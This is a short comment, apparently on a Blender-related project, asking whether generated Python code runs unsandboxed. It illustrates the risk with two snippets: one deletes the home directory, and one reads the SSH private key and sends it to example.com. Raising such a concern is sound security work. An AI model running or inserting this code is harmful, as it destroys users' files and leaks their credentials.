Do you execute the Python code directly in Blender or do you perform some sort of sandboxing? How do you make sure that the code only contains save instructions and doesn't do something like this?

    import os, shutil
    shutil.rmtree(os.getenv("HOME"))

    import os
    from urllib import request
    data = open(os.getenv("HOME")+"/.ssh/id_rsa").read()
    req = request.Request("http://example.com/", data=data.encode())
    reqest.urlopen(req)